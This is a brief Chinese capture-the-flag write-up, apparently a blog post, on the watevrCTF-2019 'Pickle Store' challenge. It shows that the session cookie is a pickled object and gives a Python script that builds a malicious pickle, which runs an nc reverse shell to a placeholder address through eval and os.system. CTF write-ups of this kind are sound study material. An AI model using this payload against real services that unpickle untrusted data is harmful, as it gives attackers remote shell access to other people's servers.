[watevrCTF-2019]Pickle Store

本文探讨了在Python中使用pickle模块进行反序列化的过程,以及如何利用潜在的安全漏洞来尝试反弹shell。作者指出,由于不明确的hmac加密过程,构造特定的数据包以购买flag变得困难。然而,他们展示了如何创建一个恶意的pickle对象,通过导入os模块并执行远程命令来触发shell。这是一个关于web安全和Python反序列化漏洞的实际应用案例。
部署运行你感兴趣的模型镜像

在这里插入图片描述

购买 flag,钱不够只有500,抓包感觉 session可能有东西
在这里插入图片描述
在这里插入图片描述

后面那串是 hmac加密的吗,先不管,题目叫做 pickle,就想到了Python的反序列化
在这里插入图片描述

确实是pickle 的序列化,下一步该怎么做,去构造 1000购买flag吗,我们不知道 hmac的加密过程,所以很难直接构造

了解到这里还可以直接反弹shell,试试

import base64
import pickle

class A(object):
    def __reduce__(self):
        return (eval, ("__import__('os').system('nc xxx.xxx.xxx.xxx 2333 -e /bin/bash')",))

a = A()
print(base64.b64encode(pickle.dumps(a)))

在这里插入图片描述

您可能感兴趣的与本文相关的镜像

Python3.8

Python3.8

Conda
Python

Python 是一种高级、解释型、通用的编程语言,以其简洁易读的语法而闻名,适用于广泛的应用,包括Web开发、数据分析、人工智能和自动化脚本

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

paidx0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值